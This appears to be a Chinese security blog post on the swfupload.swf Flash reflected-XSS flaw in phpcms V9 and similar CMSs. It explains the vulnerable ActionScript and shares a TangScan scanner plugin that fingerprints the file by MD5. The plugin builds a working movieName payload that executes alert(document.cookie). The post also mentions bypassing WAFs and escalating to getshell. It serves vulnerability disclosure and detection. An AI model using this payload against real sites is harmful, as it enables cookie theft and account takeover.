Install from PIP

pip install python-nmap

2345截图20160127212007

继续阅读 nmap from python

Tangscan插件之phpcms V9 /swfupload.swf XSS

2016年1月27日
python, Tangscan
1 条评论

最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广（国内各大cms厂商，包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等）命中率应该还可以，便给Tangscan提交了几个此类型插件，这里也分享一下代码。

先看下漏洞成因

this.movieName = root.loaderInfo.parameters.movieName;

            this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");

            this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");

            this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");

            this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");

            this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");

            this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");

            this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");

            this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");

            this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");

            this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");

            this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");

            this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");

            this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");

代码可见，从参数（root.loaderInfo.parameters.movieName）中获得movieName后直接赋值到一些callback响应函数中，这些函数是js中执行的内容。我们只需闭合前面的"]，再闭合try..catch中大括号}，即可执行自己的javascript代码，造成反射型XSS。

因为是flash xss，而且没有过多关键字，所以无视浏览器filter和大部分WAF（因为在前端运行），所以影响较大，轻则越权操作、产生XSS、csrf蠕虫，重则直接getshell（结合某些cms的后台getshell技巧）。

分享下phpcms V9 /swfupload.swf XSS POC

TangScan-ID：TS-2014-17843

#! /usr/bin/env python
# -*- coding: utf-8 -*-

import md5
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    """TangScan plugin that detects the phpcms V9 swfupload.swf reflected XSS.

    Detection is by fingerprint: the target's swfupload.swf is downloaded and
    its MD5 digest is compared with that of the known affected file.
    """

    def __init__(self):
        # Name the class explicitly: super(self.__class__, self) recurses
        # forever as soon as this class is subclassed.
        super(TangScan, self).__init__()
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": """
            phpcms V9 /swfupload.swf XSS
            """,
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        """Return the hexadecimal MD5 digest of ``content``."""
        # hashlib replaces the long-deprecated md5 module; imported locally so
        # this method does not depend on the file-level `import md5`.
        import hashlib
        return hashlib.md5(content).hexdigest()

    def verify(self):
        """Fetch swfupload.swf and flag the target when its MD5 matches.

        A request failure is stored in ``self.result.error``; on a match
        ``self.result.status`` is set and the description carries a
        verification URL.
        """
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))

        try:
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception as e:
            self.result.error = str(e)
            return

        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        """Same as verify(); there is no separate exploit step."""
        self.verify()


if __name__ == '__main__':
    # Pass a plugin instance to main() from the project-local modules.main
    # (presumably the framework's command-line runner - confirm).
    from modules.main import main
    main(TangScan())

标签： python

Hduoj用户AC题数统计爬虫

xlrd基本操作并配合matplotlib绘图笔记

Pandas基本操作笔记

Matplotlib基本图形笔记

matplotlib基本绘图笔记

numpy常用操作笔记

S2-032 远程命令执行 (POC@Tangscan)

谈谈CVE-2012-0053

0x00 前言

0x01 漏洞描述

0x02 漏洞分析

nmap from python

0x01 About

Tangscan插件之phpcms V9 /swfupload.swf XSS